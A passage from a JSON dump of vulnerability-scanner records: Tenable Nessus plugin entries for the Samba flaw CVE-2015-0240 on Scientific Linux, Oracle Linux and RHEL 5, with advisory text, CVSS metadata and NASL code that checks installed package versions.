security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:13:05", "bulletinFamily": "scanner", "description": "An uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nAfter installing this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "SL_20150223_SAMBA_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/nessus/81478", "published": "2015-02-24T00:00:00", "title": "Scientific Linux Security Update : samba on SL6.x, SL7.x i386/x86_64", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81478);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/12/28 10:10:35\");\n\n script_cve_id(\"CVE-2015-0240\");\n\n script_name(english:\"Scientific Linux Security Update : samba on SL6.x, SL7.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nAfter installing this update, the smb service will be restarted\nautomatically.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1502&L=scientific-linux-errata&T=0&P=1267\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?59e10ed5\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"libsmbclient-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"libsmbclient-devel-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-client-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-common-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-debuginfo-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-doc-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-domainjoin-gui-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-swat-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-winbind-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-winbind-clients-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-winbind-devel-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"i386\", reference:\"samba-winbind-krb5-locator-3.6.23-14.el6_6\")) flag++;\n\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libsmbclient-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libsmbclient-devel-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-client-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-common-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-debuginfo-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-doc-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-domainjoin-gui-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-swat-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-clients-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-devel-3.6.23-14.el6_6\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"samba-winbind-krb5-locator-3.6.23-14.el6_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:14:32", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2015:0251 :\n\nUpdated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2015-0251.NASL", "href": "https://www.tenable.com/plugins/nessus/81466", "published": "2015-02-24T00:00:00", "title": "Oracle Linux 6 : samba (ELSA-2015-0251)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0251 and \n# Oracle Linux Security Advisory ELSA-2015-0251 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81466);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/09/27 13:00:36\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"RHSA\", value:\"2015:0251\");\n\n script_name(english:\"Oracle Linux 6 : samba (ELSA-2015-0251)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0251 :\n\nUpdated samba packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-February/004856.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected samba packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-glusterfs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:samba-winbind-krb5-locator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libsmbclient-devel-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-client-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-common-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-doc-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-domainjoin-gui-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"samba-glusterfs-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-swat-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-clients-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-devel-3.6.23-14.0.1.el6_6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"samba-winbind-krb5-locator-3.6.23-14.0.1.el6_6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libsmbclient / libsmbclient-devel / samba / samba-client / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:20:58", "bulletinFamily": "scanner", "description": "Updated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life and Red Hat Enterprise\nLinux 5.9 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2015-0253.NASL", "href": "https://www.tenable.com/plugins/nessus/81472", "published": "2015-02-24T00:00:00", "title": "RHEL 5 : samba3x (RHSA-2015:0253)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0253. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81472);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0240\");\n script_bugtraq_id(72711);\n script_xref(name:\"RHSA\", value:\"2015:0253\");\n\n script_name(english:\"RHEL 5 : samba3x (RHSA-2015:0253)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated samba3x packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life and Red Hat Enterprise\nLinux 5.9 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nSamba is an open source implementation of the Server Message Block\n(SMB) or Common Internet File System (CIFS) protocol, which allows\nPC-compatible machines to share files, printers, and other\ninformation.\n\nAn uninitialized pointer use flaw was found in the Samba daemon\n(smbd). A malicious Samba client could send specially crafted netlogon\npackets that, when processed by smbd, could potentially lead to\narbitrary code execution with the privileges of the user running smbd\n(by default, the root user). (CVE-2015-0240)\n\nFor additional information about this flaw, see the Knowledgebase\narticle at https://access.redhat.com/articles/1346913\n\nRed Hat would like to thank the Samba project for reporting this\nissue. Upstream acknowledges Richard van Eeden of Microsoft\nVulnerability Research as the original reporter of this issue.\n\nAll Samba users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. After\ninstalling this update, the smb service will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/articles/1346913\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0240\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-domainjoin-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-swat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:samba3x-winbind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0253\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"samba3x-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"samba3x-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"samba3x-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-client-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"samba3x-client-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"samba3x-client-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-client-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"samba3x-client-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-common-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"samba3x-common-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"samba3x-common-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-common-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"samba3x-common-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"samba3x-debuginfo-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-debuginfo-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-debuginfo-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"samba3x-doc-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"samba3x-doc-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-doc-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"samba3x-doc-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"samba3x-domainjoin-gui-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"samba3x-domainjoin-gui-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"samba3x-domainjoin-gui-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"samba3x-swat-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"samba3x-swat-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"samba3x-swat-3.5.4-0.70.el5_6.4\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"samba3x-swat-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"samba3x-winbind-3.6.6-0.131.el5_9\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", 